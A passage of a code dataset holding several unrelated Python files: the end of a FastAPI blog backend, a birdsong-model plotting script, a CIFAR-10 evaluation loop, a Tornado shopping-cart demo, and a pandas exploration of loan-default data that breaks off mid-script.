len(blogs)==1:\n blog=blogs[0]\n blog.delete()\n else:\n return {\"message\":\"none\"}\n\n@app.post(\"/edit/uploadImg\")\nasync def postUploadImgApi(sessionId=Cookie(None), img: UploadFile = File(None)):\n s = session.getSession(sessionId)\n if s:\n user = db.get(\"user\", id=s['userId'])\n else:\n return {\"message\": \"no signIn\"}\n data = img.file.read()\n imgId = db.create(\"files\", file=database.sqlite3.Binary(\n data), userId=user.id).id\n url = f\"/api/asset/img/{imgId}\"\n return {\n \"message\": \"success\",\n \"url\": url\n }\n\n\n@app.post(\"/edit/deleteImg\")\nasync def postDelImgApi(imgId: int, sessionId=Cookie(None)):\n s = session.getSession(sessionId)\n if s:\n user = db.get(\"user\", id=s['userId'])\n else:\n return {\"message\": \"no signIn\"}\n imgs = db.filter(\"files\", id=imgId)\n if len(imgs) == 1:\n img = imgs[0]\n if img.userId == user.id:\n db.remove(\"files\", id=imgId)\n else:\n return {\"message\": \"403\"}\n\n\n@app.get(\"/asset/img/{imgId}\")\nasync def getImgApi(imgId: int):\n img = db.get(\"files\", id=imgId)\n imgD = img.file\n buffer = io.BytesIO(imgD)\n r = StreamingResponse(buffer)\n return r\n\n\nif __name__ == \"__main__\":\n uvicorn.run(app)","sub_path":"backProject/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":13798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"456371700","text":"import json\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom os.path import basename, join\nimport pandas\nimport pickle\nfrom scipy.io import wavfile\nimport sys\nimport warnings\n\nimport birdsonganalysis as bsa\nimport utils\n\nsys.path.append('../model/')\nfrom measures import bsa_measure, normalize_and_center\n\ndef get_run_param_and_songlog(path):\n with open(join(path, 'conf.json'), 'r') as f:\n run_param = json.load(f)\n\n try:\n with open(join(path, 'data.pkl'), 'rb') as f:\n songlog = pickle.load(f)\n except FileNotFoundError:\n try:\n warnings.warn('Learning not over')\n with open(join(path, 'data_cur.pkl'), 'rb') as f:\n songlog = pickle.load(f)\n except FileNotFoundError:\n print(\"Error: no data files\")\n \n return run_param, songlog\n\ndef get_rd_best_smodel_and_score(songlog):\n root_data = [item[1] for item in songlog if item[0] == 'root']\n rd = pandas.DataFrame(root_data)\n best = np.argmin(rd['scores'].iloc[-1])\n smodel = rd['songs'].iloc[-1][best]\n score = rd['scores'].iloc[-1][best]\n return rd, smodel, score\n\ndef get_features(song, param_feat):\n song_feat = bsa.all_song_features(song,\n bsa.SR,\n freq_range=bsa.FREQ_RANGE,\n fft_step=bsa.FFT_STEP,\n fft_size=bsa.FFT_SIZE)\n return bsa.rescaling_with_tutor_values(param_feat, song_feat)\n\ndef generate_data_struct(l_path):\n sim = []\n for path in l_path:\n d = {}\n d[\"fft_step\"] = bsa.FFT_STEP\n d[\"freq_range\"] = bsa.FREQ_RANGE\n d[\"fft_size\"] = bsa.FFT_SIZE\n d[\"sr\"], d[\"tutor\"] = wavfile.read(join(path, 'tutor.wav'))\n d[\"tspec\"] = bsa.spectral_derivs(d[\"tutor\"],\n d[\"freq_range\"],\n d[\"fft_step\"],\n d[\"fft_size\"])\n d[\"run_param\"], d[\"songlog\"] = get_run_param_and_songlog(path)\n rd, smodel, score = get_rd_best_smodel_and_score(d[\"songlog\"])\n d[\"rd\"] = rd\n d[\"smodel\"] = smodel\n d[\"score\"] = score\n d[\"song\"] = smodel.gen_sound()\n d[\"starts\"] = []\n for i, gesture in enumerate(d[\"smodel\"].gestures):\n d[\"starts\"].append(gesture[0])\n d[\"smspec\"] = bsa.spectral_derivs(d[\"song\"],\n d[\"freq_range\"],\n d[\"fft_step\"],\n d[\"fft_size\"])\n song_name = basename(d[\"run_param\"]['tutor']).split('.')[0]\n synth_ab = np.loadtxt('../data/{}_ab.dat'.format(song_name))\n d[\"ab\"] = d[\"smodel\"].gen_alphabeta()\n for start, g in d[\"smodel\"].gestures:\n d[\"ab\"][start] = np.nan\n d[\"synth_ab\"] = synth_ab\n nct = normalize_and_center(d[\"tutor\"])\n param_feat= bsa.all_song_features(nct, d[\"sr\"],\n freq_range=d[\"freq_range\"],\n fft_step=d[\"fft_step\"],\n fft_size=d[\"fft_size\"])\n d[\"tfeat\"] = get_features(d[\"tutor\"], param_feat)\n d[\"smfeat\"] = get_features(d[\"song\"], param_feat)\n tmp = '../data/{}_out.wav'\n sr, d[\"synth\"] = wavfile.read(tmp.format(song_name))\n d[\"Boari_score\"] = utils.boari_synth_song_error(d[\"tutor\"],\n d[\"synth\"],\n d[\"run_param\"]['coefs'],\n tutor_feat=param_feat)\n d[\"mtutor\"] = bsa_measure(d[\"tutor\"], d[\"sr\"],\n coefs=d[\"run_param\"]['coefs'],\n tutor_feat=param_feat)\n d[\"msynth\"] = bsa_measure(d[\"synth\"], d[\"sr\"],\n coefs=d[\"run_param\"]['coefs'],\n tutor_feat=param_feat)\n d[\"msong\"] = bsa_measure(d[\"song\"], d[\"sr\"],\n coefs=d[\"run_param\"]['coefs'],\n tutor_feat=param_feat)\n sim.append(d)\n return sim\n\ndef plot_gesture_starts(starts, scale=1, color=\"k\"):\n for start in starts:\n plt.axvline(start / scale, color=color, linewidth=1, alpha=0.2)\n\ndef plot_fig(sim, sims, titles):\n fnames = [\"fm\", \"am\", \"entropy\", \"goodness\", \"amplitude\", \"pitch\", \"rms\"]\n nb_row = 8 + len(fnames)\n nb_col = len(sim)\n color_song = \"C1\"\n color_synth = \"C2\"\n zoom = bsa.FFT_SIZE / bsa.FREQ_RANGE / 4\n \n plt.figure(figsize=(16, nb_row * 5))\n for i in range(nb_col):\n pos = 1 + i\n \n plt.subplot(nb_row, nb_col, pos)\n plt.plot(sim[i][\"tutor\"])\n plt.xlim(0, len(sim[i][\"tutor\"]))\n plt.title(sims[i]+\"\\n\"+titles[i]+\"\\n\\n\"+\"Tutor sound\")\n pos += nb_col\n \n plt.subplot(nb_row, nb_col, pos)\n plt.plot(sim[i][\"song\"], color=color_song)\n plot_gesture_starts(sim[i][\"starts\"])\n plt.xlim(0, len(sim[i][\"song\"]))\n plt.title(\"Song model sound\")\n pos += nb_col\n \n ax = plt.subplot(nb_row, nb_col, pos)\n bsa.spectral_derivs_plot(sim[i][\"tspec\"], contrast=0.01, ax=ax)\n ax.set_ylim(0, bsa.FREQ_RANGE * zoom)\n ax.set_title(\"Tutor spectral derivative\")\n pos += nb_col\n \n ax = plt.subplot(nb_row, nb_col, pos)\n bsa.spectral_derivs_plot(sim[i][\"smspec\"], contrast=0.01, ax=ax)\n ax.set_ylim(0, bsa.FREQ_RANGE * zoom)\n plot_gesture_starts(sim[i][\"starts\"], scale=sim[i][\"fft_step\"])\n ax.set_title(\"Song spectral derivative\")\n pos += nb_col\n \n ax = plt.subplot(nb_row, nb_col, pos)\n ax = utils.draw_learning_curve(sim[i][\"rd\"], ax=ax)\n ax.axhline(y=-1 * sim[i][\"Boari_score\"], color=\"C3\",\n linestyle='-', label=\"Boari's error\")\n ax.legend()\n pos += nb_col\n \n for fname in fnames:\n plt.subplot(nb_row, nb_col, pos)\n plt.plot(sim[i][\"tfeat\"][fname], label=\"tutor\")\n plt.plot(sim[i][\"smfeat\"][fname], label=\"song\")\n plot_gesture_starts(sim[i][\"starts\"], scale=sim[i][\"fft_step\"])\n plt.xlim(0,len(sim[i][\"tfeat\"][fname]))\n plt.legend()\n plt.title(fname)\n pos += nb_col\n \n plt.subplot(nb_row, nb_col, pos)\n plt.plot(sim[i][\"synth_ab\"][:, 1], label=\"synth\",color=color_synth)\n plt.plot(sim[i][\"ab\"][:, 1], label=\"song\", color=color_song)\n plot_gesture_starts(sim[i][\"starts\"])\n plt.xlim(0,len(sim[i][\"ab\"][:, 1]))\n plt.legend()\n plt.title(\"Beta\")\n pos += nb_col\n \n # Normalization of alpha values for better comparison\n# num = sim[i][\"synth_ab\"][:, 0] - np.min(sim[i][\"synth_ab\"][:, 0])\n# min_v = np.min(sim[i][\"synth_ab\"][:, 0])\n# max_v = np.max(sim[i][\"synth_ab\"][:, 0])\n# denum = max_v - min_v\n# a_synth = num / denum\n# num = sim[i][\"ab\"][:,0] - np.nanmin(sim[i][\"ab\"][:,0])\n# denum = np.nanmax(sim[i][\"ab\"][:,0]) - np.nanmin(sim[i][\"ab\"][:,0])\n# a_sm = num / denum\n\n a_synth = sim[i][\"synth_ab\"][:, 0]\n a_sm = sim[i][\"ab\"][:,0]\n\n # Inversion of the plot order for better readability\n ax = plt.subplot(nb_row, nb_col, pos)\n line1, = plt.plot(a_sm, label=\"song\", color=color_song)\n line2, = plt.plot(a_synth, label=\"synth\", color=color_synth)\n plot_gesture_starts(sim[i][\"starts\"])\n plt.xlim(0, len(a_sm))\n ax.legend((line2, line1), (\"synth\", \"song\"))\n# plt.title(\"Alpha (normalized)\")\n plt.title(\"Alpha\")\n pos += nb_col\n \n # Calculation of each feature error\n amp, th = utils.carac_to_calculate_err_of_synth(sim[i][\"synth\"],\n t_amp=sim[i][\"tfeat\"][\"amplitude\"])\n err_feat_vect = utils.err_per_feat(sim[i][\"mtutor\"],\n sim[i][\"msong\"])\n err_feat_vect_synth = utils.err_per_feat(sim[i][\"mtutor\"][amp > th],\n sim[i][\"msynth\"][amp > th])\n x = np.arange(0,len(err_feat_vect))\n ax = plt.subplot(nb_row, nb_col, pos)\n synth_score = round(sim[i][\"Boari_score\"], 2)\n song_score = round(sim[i][\"score\"], 2)\n synth_label = \"synth ({})\".format(synth_score)\n song_label = \"song ({})\".format(song_score)\n plt.bar(x - 0.1, err_feat_vect_synth,\n width=0.2, align='center', label=synth_label, color=color_synth)\n plt.bar(x + 0.1, err_feat_vect,\n width=0.2, align='center', label=song_label, color=color_song)\n plt.xticks(x, fnames)\n shift = np.max(np.concatenate((err_feat_vect_synth, err_feat_vect))) / 100\n for index in x:\n v_synth = err_feat_vect_synth[index]\n v_song = err_feat_vect[index]\n ax.text(index - 0.1, v_synth + shift,\n str(round(v_synth, 2)),\n color=color_synth, ha=\"center\", fontweight='bold')\n ax.text(index + 0.1, v_song + shift,\n str(round(v_song, 2)),\n color=color_song, ha=\"center\", fontweight='bold')\n plt.legend()\n plt.title(\"Errors\")\n\n plt.show()\n","sub_path":"analysis/cmp_2_sim.py","file_name":"cmp_2_sim.py","file_ext":"py","file_size_in_byte":9447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"563821368","text":"\nimport tensorflow as tf\nimport cifar10_data\nimport cifar10_model\nimport numpy as np\nfrom datetime import datetime\nimport time\n\n# Get testing images and labels for CIFAR-10.\n# inputs img shape: [batch_size, 24, 24, 3], data type: float32, range: [0, 1]\n# lbl shape: [batch_size,], data type: int32, range: [0, 9]\nimages, labels, iter = cifar10_data.inputs(\n True, './input_data', cifar10_data.EVAL_BATCH_SIZE)\n\n# Build a Graph that computes the logits predictions from the inference model.\nlogits = cifar10_model.inference(images, 1.0, False)\n\n# Calculate predictions.\ntop_k_op = tf.nn.in_top_k(logits, labels, 1)\n\n# Init session\ninit = tf.global_variables_initializer()\nsess = tf.Session()\nsess.run(init)\n\n# Create a saver.\n# saver = tf.train.Saver()\n# Restore the moving average version of the learned variables for eval.\nvariable_averages = tf.train.ExponentialMovingAverage(0.9999)\nvariables_to_restore = variable_averages.variables_to_restore()\nsaver = tf.train.Saver(variables_to_restore)\n\n# Get the summary writer.\nsummary_writer = tf.summary.FileWriter(cifar10_data.EVAL_LOG_DIR, sess.graph)\n\nwhile True:\n ckpt = tf.train.get_checkpoint_state(cifar10_data.CKPT_DIR)\n if ckpt and ckpt.model_checkpoint_path:\n # Restores from checkpoint\n saver.restore(sess, ckpt.model_checkpoint_path)\n # Assuming model_checkpoint_path looks something like:\n # /my-favorite-path/cifar10_train/model.ckpt-0.xxx,\n # extract global_step from it.\n global_step = int(ckpt.model_checkpoint_path.split('/')[-1].split('-')[-1].split('.')[0])\n else:\n print('No checkpoint file found')\n time.sleep(200)\n continue\n\n # Re-initialize dataset iterator\n sess.run(iter.initializer)\n\n true_count = 0 # Counts the number of correct predictions.\n total_sample_count = 0\n while True:\n try:\n predictions = sess.run(top_k_op)\n true_count += np.sum(predictions)\n total_sample_count += cifar10_data.EVAL_BATCH_SIZE\n except tf.errors.OutOfRangeError:\n break\n\n # Compute precision @ 1.\n precision = true_count / total_sample_count\n print('%s: precision @ %d = %.3f' % (datetime.now(), global_step, precision))\n summary = tf.Summary()\n summary.value.add(tag='Precision @ 1', simple_value=precision)\n summary_writer.add_summary(summary, global_step)\n\n if global_step >= cifar10_data.MAX_TRAIN_STEPS - 1:\n break\n time.sleep(200)\n\nsummary_writer.close()\nsess.close()\n","sub_path":"cifar10_v2/cifar10_eval.py","file_name":"cifar10_eval.py","file_ext":"py","file_size_in_byte":2516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"72665664","text":"#!/usr/bin/env python\n#-*- coding: utf-8 -*-\n\n#/cart/ ajax 添加、删除\n#/cart/ststus/ 长轮询api,\n#/主页显示\n\nimport tornado.web\nimport tornado.ioloop\nimport tornado.options\nimport tornado.httpserver\nimport uuid\nfrom tornado.options import define,options\ndefine('port',8000,help='输入端口',type=int)\n\nclass ShopCart(object):\n Inventory=10\n callbacks=[]\n carts={}\n def register(self,callback):\n self.callbacks.append(callback)\n\n def addCart(self,session):\n if session in self.carts:\n return\n self.carts[session]=True\n self.notifyAll()\n\n def removeCart(self,session):\n if session not in self.carts:\n return\n del self.carts[session]\n self.notifyAll()\n\n def getInventory(self):\n return self.Inventory-len(self.carts)\n\n def notifyAll(self):\n for cb in self.callbacks:\n cb(self.getInventory())\n self.callbacks=[]\n\n\nclass Application(tornado.web.Application):\n def __init__(self):\n self.shopCart=ShopCart()\n handlers=[\n (r'/',IndexHandler),\n (r'/cart/',CartHandler),\n (r'/cart/status/',StatusHandler)\n ]\n settings=dict(\n template_path='templates',\n static_path='static',\n debug=True\n )\n tornado.web.Application.__init__(self,handlers=handlers,**settings)\n\n\nclass IndexHandler(tornado.web.RequestHandler):\n def get(self, *args, **kwargs):\n session=uuid.uuid4()\n count=self.application.shopCart.getInventory()\n self.render('cart.html',count=count,session=session)\n\nclass CartHandler(tornado.web.RequestHandler):\n def post(self, *args, **kwargs):\n session=self.get_argument('session')\n action=self.get_argument('action')\n if not session:\n self.set_status(400)\n return\n\n if action=='add':\n self.application.shopCart.addCart(session)\n elif action=='remove':\n self.application.shopCart.removeCart(session)\n else:\n self.set_status(400)\n\nclass StatusHandler(tornado.web.RequestHandler):\n @tornado.web.asynchronous\n def get(self):\n self.application.shopCart.register(self.on_message)\n\n def on_message(self,count):\n self.set_header(\"Content-Type\", \"application/json\")\n self.write('{\"inventoryCount\":\"%d\"}'%count)\n self.finish()\n\nhttp_server=tornado.httpserver.HTTPServer(Application())\nhttp_server.listen(options.port)\ntornado.ioloop.IOLoop.instance().start()","sub_path":"cart/cart.py","file_name":"cart.py","file_ext":"py","file_size_in_byte":2557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"158737667","text":"import pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport sklearn\r\nimport seaborn as sns\r\n\r\n\r\nbureau_balance = pd.read_csv('bureau_balance.csv')\r\napplication_train = pd.read_csv('application_train.csv')\r\nbureau = pd.read_csv('bureau.csv')\r\ncredit_bal = pd.read_csv(\"credit_card_balance.csv\")\r\ninstal_payment = pd.read_csv(\"installments_payments.csv\")\r\nPOS_CASH_balance = pd.read_csv(\"POS_CASH_balance.csv\")\r\nprev_app = pd.read_csv(\"previous_application.csv\")\r\napplication_test = pd.read_csv('application_test.csv')\r\n\r\n\r\n# Training and Testing data features\r\nprint('Training data shape: ', application_train.shape)\r\nprint('Testing data shape: ', application_test.shape)\r\napplication_train['TARGET'].value_counts()\r\n\r\n# Function to calculate missing values by column# Funct \r\ndef missing_values_table(df):\r\n # Total missing values\r\n mis_val = df.isnull().sum()\r\n \r\n # Percentage of missing values\r\n mis_val_percent = 100 * df.isnull().sum() / len(df)\r\n \r\n # Make a table with the results\r\n mis_val_table = pd.concat([mis_val, mis_val_percent], axis=1)\r\n \r\n # Rename the columns\r\n mis_val_table_ren_columns = mis_val_table.rename(\r\n columns = {0 : 'Missing Values', 1 : '% of Total Values'})\r\n \r\n # Sort the table by percentage of missing descending\r\n mis_val_table_ren_columns = mis_val_table_ren_columns[\r\n mis_val_table_ren_columns.iloc[:,1] != 0].sort_values(\r\n '% of Total Values', ascending=False).round(1)\r\n \r\n # Print some summary information\r\n print (\"Your selected dataframe has \" + str(df.shape[1]) + \" columns.\\n\" \r\n \"There are \" + str(mis_val_table_ren_columns.shape[0]) +\r\n \" columns that have missing values.\")\r\n \r\n # Return the dataframe with missing information\r\n return mis_val_table_ren_columns\r\n# Missing values statistics\r\nmissing_values = missing_values_table(application_train)\r\nmissing_values.head(20)\r\n\r\n# Number of unique classes in each object column (categorical)\r\n#application_train.dtypes.value_counts()\r\n\r\napplication_train.select_dtypes(include=['object']).apply(pd.Series.nunique, axis = 0)\r\n\r\n# Create a label encoder object\r\nfrom sklearn.preprocessing import LabelEncoder\r\n\r\nle = LabelEncoder()\r\nle_count = 0\r\n# Iterate through the columns\r\nfor col in application_train:\r\n if application_train[col].dtype == 'object':\r\n # If 2 or fewer unique categories\r\n if len(list(application_train[col].unique())) <= 2:\r\n # Train on the training data\r\n le.fit(application_train[col])\r\n # Transform both training and testing data\r\n application_train[col] = le.transform(application_train[col])\r\n application_test[col] = le.transform(application_test[col])\r\n \r\n # Keep track of how many columns were label encoded\r\n le_count += 1\r\n \r\nprint('%d columns were label encoded.' % le_count)\r\n\r\n\r\n# one-hot encoding of categorical variables\r\napplication_train = pd.get_dummies(application_train)\r\napplication_test = pd.get_dummies(application_test)\r\n\r\nprint('Training Features shape: ', application_train.shape)\r\nprint('Testing Features shape: ', application_test.shape)\r\n\r\ntrain_labels = application_train['TARGET']\r\n\r\n# Align the training and testing data, keep only columns present in both dataframes\r\napplication_train, application_test = application_train.align(application_test, join = 'inner', axis = 1)\r\n\r\n# Add the target back in\r\napplication_train['TARGET'] = train_labels\r\n\r\nprint('Training Features shape: ', application_train.shape)\r\nprint('Testing Features shape: ', application_test.shape)\r\n\r\n\r\n(application_train['DAYS_BIRTH'] / -365).describe()\r\n\r\napplication_train['DAYS_EMPLOYED'].describe()\r\n\r\nplt.hist(application_train['DAYS_EMPLOYED'])\r\n#application_train['DAYS_EMPLOYED'].astype(int).plot.hist();\r\n#(title = 'Days Employment Histogram')\r\nplt.xlabel('Days Employment')\r\n\r\nanom = application_train[application_train['DAYS_EMPLOYED'] == 365243]\r\nnon_anom = application_train[application_train['DAYS_EMPLOYED'] != 365243]\r\nprint('The non-anomalies default on %0.2f%% of loans' % (100 * non_anom['TARGET'].mean()))\r\nprint('The anomalies default on %0.2f%% of loans' % (100 * anom['TARGET'].mean()))\r\nprint('There are %d anomalous days of employment' % len(anom))\r\n\r\n\r\n# Create an anomalous flag column\r\napplication_train['DAYS_EMPLOYED_ANOM'] = application_train[\"DAYS_EMPLOYED\"] == 365243\r\n\r\n# Replace the anomalous values with nan\r\napplication_train['DAYS_EMPLOYED'].replace({365243: np.nan}, inplace = True)\r\n\r\napplication_train['DAYS_EMPLOYED'].plot.hist(title = 'Days Employment Histogram');\r\nplt.xlabel('Days Employment');\r\n\r\n\r\napplication_test['DAYS_EMPLOYED_ANOM'] = application_test[\"DAYS_EMPLOYED\"] == 365243\r\napplication_test[\"DAYS_EMPLOYED\"].replace({365243: np.nan}, inplace = True)\r\n\r\nprint('There are %d anomalies in the test data out of %d entries' % (application_test[\"DAYS_EMPLOYED_ANOM\"].sum(), len(application_test)))\r\n\r\n\r\n# Find correlations with the target and sort\r\ncorrelations = application_train.corr()['TARGET'].sort_values()\r\n\r\n# Display correlations\r\nprint('Most Positive Correlations:\\n', correlations.tail(15))\r\nprint('\\nMost Negative Correlations:\\n', correlations.head(15))\r\n\r\n# Find the correlation of the positive days since birth and target\r\napplication_train['DAYS_BIRTH'] = abs(application_train['DAYS_BIRTH'])\r\napplication_train['DAYS_BIRTH'].corr(application_train['TARGET'])\r\n\r\n# Set the style of plots\r\nplt.style.use('fivethirtyeight')\r\n\r\n# Plot the distribution of ages in years\r\nplt.hist(application_train['DAYS_BIRTH'] / 365, edgecolor = 'k', bins = 25)\r\nplt.title('Age of Client'); plt.xlabel('Age (years)'); plt.ylabel('Count');\r\n\r\n\r\nplt.figure(figsize = (10, 8))\r\n\r\n# KDE plot of loans that were repaid on time\r\nsns.kdeplot(application_train.loc[application_train['TARGET'] == 0, 'DAYS_BIRTH'] / 365, label = 'target == 0')\r\n\r\n# KDE plot of loans which were not repaid on time\r\nsns.kdeplot(application_train.loc[application_train['TARGET'] == 1, 'DAYS_BIRTH'] / 365, label = 'target == 1')\r\n\r\n# Labeling of plot\r\nplt.xlabel('Age (years)'); plt.ylabel('Density'); plt.title('Distribution of Ages');\r\n\r\n\r\n# Age information into a separate dataframe\r\nage_data = application_train[['TARGET', 'DAYS_BIRTH']]\r\nage_data['YEARS_BIRTH'] = age_data['DAYS_BIRTH'] / 365\r\n\r\n# Bin the age data\r\nage_data['YEARS_BINNED'] = pd.cut(age_data['YEARS_BIRTH'], bins = np.linspace(20, 70, num = 11))\r\nage_data.head(10)\r\n\r\n\r\n# Group by the bin and calculate averages\r\nage_groups = age_data.groupby('YEARS_BINNED').mean()\r\nage_groups\r\n\r\n\r\nplt.figure(figsize = (8, 8))\r\n\r\n# Graph the age bins and the average of the target as a bar plot\r\nage_groups.TARGET.plot(kind='bar')\r\n# Plot labeling\r\nplt.xticks(rotation = 75); plt.xlabel('Age Group (years)'); plt.ylabel('Failure to Repay (%)')\r\nplt.title('Failure to Repay by Age Group');\r\n\r\n\r\n# Extract the EXT_SOURCE variables and show correlations\r\next_data = application_train[['TARGET', 'EXT_SOURCE_1', 'EXT_SOURCE_2', 'EXT_SOURCE_3', 'DAYS_BIRTH']]\r\next_data_corrs = ext_data.corr()\r\next_data_corrs\r\n\r\n\r\nplt.figure(figsize = (8, 6))\r\n\r\n# Heatmap of correlations\r\nsns.heatmap(ext_data_corrs, cmap = plt.cm.RdYlBu_r, vmin = -0.25, annot = True, vmax = 0.6)\r\nplt.title('Correlation Heatmap');\r\n\r\n\r\nplt.figure(figsize = (10, 12))\r\n\r\n# iterate through the sources\r\n#for i, source in enumerate(['EXT_SOURCE_1', 'EXT_SOURCE_2', 'EXT_SOURCE_3']):\r\n \r\n # create a new subplot for each source\r\n # plt.subplot(3, 1, i + 1)\r\n # plot repaid loans\r\n # sns.kdeplot(application_train.loc[application_train['TARGET'] == 0, source], label = 'target == 0')\r\n # plot loans that were not repaid\r\n # sns.kdeplot(application_train.loc[application_train['TARGET'] == 1, source], label = 'target == 1')\r\n \r\n # Label the plots\r\n #plt.title('Distribution of %s by Target Value' % source)\r\n # plt.xlabel('%s' % source); plt.ylabel('Density');\r\n \r\n#plt.tight_layout(h_pad = 2.5)\r\n\r\n# Groupby the client id (SK_ID_CURR), count the number of previous loans, and rename the column\r\nprevious_loan_counts = bureau.groupby('SK_ID_CURR', as_index=False)['SK_ID_BUREAU'].count().rename(columns = {'SK_ID_BUREAU': 'previous_loan_counts'})\r\n\r\napplication_train = application_train.merge(previous_loan_counts, on = 'SK_ID_CURR', how = 'left')\r\n\r\napplication_test = application_test.merge(previous_loan_counts, on = 'SK_ID_CURR', how = 'left')\r\n\r\n\r\n# Fill the missing values with 0 \r\napplication_train['previous_loan_counts'] = application_train['previous_loan_counts'].fillna(0)\r\n\r\n# Plots the disribution of a variable colored by value of the target\r\ndef kde_target(var_name, df):\r\n \r\n # Calculate the correlation coefficient between the new variable and the target\r\n corr = df['TARGET'].corr(df[var_name])\r\n \r\n # Calculate medians for repaid vs not repaid\r\n avg_repaid = df.ix[df['TARGET'] == 0, var_name].median()\r\n avg_not_repaid = df.ix[df['TARGET'] == 1, var_name].median()\r\n \r\n plt.figure(figsize = (12, 6))\r\n \r\n # Plot the distribution for target == 0 and target == 1\r\n sns.kdeplot(df.ix[df['TARGET'] == 0, var_name], label = 'TARGET == 0')\r\n sns.kdeplot(df.ix[df['TARGET'] == 1, var_name], label = 'TARGET == 1')\r\n \r\n # label the plot\r\n plt.xlabel(var_name); plt.ylabel('Density'); plt.title('%s Distribution' % var_name)\r\n plt.legend();\r\n \r\n # print out the correlation\r\n print('The correlation between %s and the TARGET is %0.4f' % (var_name, corr))\r\n # Print out average values\r\n print('Median value for loan that was not repaid = %0.4f' % avg_not_repaid)\r\n print('Median value for loan that was repaid = %0.4f' % avg_repaid)\r\n \r\n \r\nkde_target('EXT_SOURCE_1', application_train)\r\nkde_target('EXT_SOURCE_2', application_train)\r\nkde_target('EXT_SOURCE_3', application_train)\r\n\r\n\r\nkde_target('previous_loan_counts', application_train)\r\n\r\nkde_target('bureau_DAYS_CREDIT_mean', application_train)\r\n\r\n\r\n#Function for Numeric Aggregations\r\n\r\ndef agg_numeric(df, group_var, df_name):\r\n \"\"\"Aggregates the numeric values in a dataframe. This can\r\n be used to create features for each instance of the grouping variable.\r\n \r\n Parameters\r\n --------\r\n df (dataframe): \r\n the dataframe to calculate the statistics on\r\n group_var (string): \r\n the variable by which to group df\r\n df_name (string): \r\n the variable used to rename the columns\r\n \r\n Return\r\n --------\r\n agg (dataframe): \r\n a dataframe with the statistics aggregated for \r\n all numeric columns. Each instance of the grouping variable will have \r\n the statistics (mean, min, max, sum; currently supported) calculated. \r\n The columns are also renamed to keep track of features created.\r\n \r\n \"\"\"\r\n # Remove id variables other than grouping variable\r\n for col in df:\r\n if col != group_var and 'SK_ID' in col:\r\n df = df.drop(col, axis=1)\r\n \r\n group_ids = df[group_var]\r\n numeric_df = df.select_dtypes(include=['number'])\r\n numeric_df[group_var] = group_ids\r\n\r\n # Group by the specified variable and calculate the statistics\r\n agg = numeric_df.groupby(group_var).agg(['count', 'mean', 'max', 'min', 'sum']).reset_index()\r\n\r\n # Need to create new column names\r\n columns = [group_var]\r\n\r\n # Iterate through the variables names\r\n for var in agg.columns.levels[0]:\r\n # Skip the grouping variable\r\n if var != group_var:\r\n # Iterate through the stat names\r\n for stat in agg.columns.levels[1][:-1]:\r\n # Make a new column name for the variable and stat\r\n columns.append('%s_%s_%s' % (df_name, var, stat))\r\n\r\n agg.columns = columns\r\n return agg\r\n\r\n\r\n\r\n# Function to calculate correlations with the target for a dataframe\r\ndef target_corrs(df):\r\n\r\n # List of correlations\r\n corrs = []\r\n\r\n # Iterate through the columns \r\n for col in df.columns:\r\n print(col)\r\n # Skip the target column\r\n if col != 'TARGET':\r\n # Calculate correlation with the target\r\n corr = df['TARGET'].corr(df[col])\r\n\r\n # Append the list as a tuple\r\n corrs.append((col, corr))\r\n \r\n # Sort by absolute magnitude of correlations\r\n corrs = sorted(corrs, key = lambda x: abs(x[1]), reverse = True)\r\n \r\n return corrs\r\n\r\n\r\n#Function to Handle Categorical Variables\r\n\r\ndef count_categorical(df, group_var, df_name):\r\n \"\"\"Computes counts and normalized counts for each observation\r\n of `group_var` of each unique category in every categorical variable\r\n \r\n Parameters\r\n --------\r\n df : dataframe \r\n The dataframe to calculate the value counts for.\r\n \r\n group_var : string\r\n The variable by which to group the dataframe. For each unique\r\n value of this variable, the final dataframe will have one row\r\n \r\n df_name : string\r\n Variable added to the front of column names to keep track of columns\r\n\r\n \r\n Return\r\n --------\r\n categorical : dataframe\r\n A dataframe with counts and normalized counts of each unique category in every categorical variable\r\n with one row for every unique value of the `group_var`.\r\n \r\n \"\"\"\r\n \r\n # Select the categorical columns\r\n categorical = pd.get_dummies(df.select_dtypes(include=['object']))\r\n\r\n # Make sure to put the identifying id on the column\r\n categorical[group_var] = df[group_var]\r\n\r\n # Groupby the group var and calculate the sum and mean\r\n categorical = categorical.groupby(group_var).agg(['sum', 'mean'])\r\n \r\n column_names = []\r\n \r\n # Iterate through the columns in level 0\r\n for var in categorical.columns.levels[0]:\r\n # Iterate through the stats in level 1\r\n for stat in ['count', 'count_norm']:\r\n # Make a new column name\r\n column_names.append('%s_%s_%s' % (df_name, var, stat))\r\n \r\n categorical.columns = column_names\r\n \r\n return categorical\r\n\r\n\r\n#Bureau Data\r\n# Group by the client id, calculate aggregation statistics\r\nbureau_agg_new = agg_numeric(bureau.drop('SK_ID_BUREAU',axis=1), group_var = 'SK_ID_CURR', df_name = 'bureau')\r\nbureau_agg_new.head()\r\n\r\napplication_train = application_train.merge(bureau_agg_new, on = 'SK_ID_CURR', how = 'left')\r\n\r\napplication_test = application_test.merge(bureau_agg_new, on = 'SK_ID_CURR', how = 'left')\r\n\r\n\r\nbureau_counts = count_categorical(bureau, group_var = 'SK_ID_CURR', df_name = 'bureau')\r\nbureau_counts.head()\r\n\r\n\r\napplication_train = application_train.merge(bureau_counts, left_on = 'SK_ID_CURR', right_index = True, how = 'left')\r\n\r\napplication_test = application_test.merge(bureau_counts, left_on = 'SK_ID_CURR', right_index = True, how = 'left')\r\n\r\n\r\napplication_train.shape\r\n\r\napplication_test.shape\r\n\r\n#Value counts of Bureau Balance dataframe by loan\r\n\r\nbureau_balance_counts = count_categorical(bureau_balance, group_var = 'SK_ID_BUREAU', df_name = 'bureau_balance')\r\nbureau_balance_counts.head()\r\n\r\nbureau_balance_agg = agg_numeric(bureau_balance, group_var = 'SK_ID_BUREAU', df_name = 'bureau_balance')\r\nbureau_balance_agg.head()\r\n\r\n\r\n# Dataframe grouped by the loan\r\nbureau_by_loan = bureau_balance_agg.merge(bureau_balance_counts, right_index = True, left_on = 'SK_ID_BUREAU', how = 'outer')\r\n\r\n# Merge to 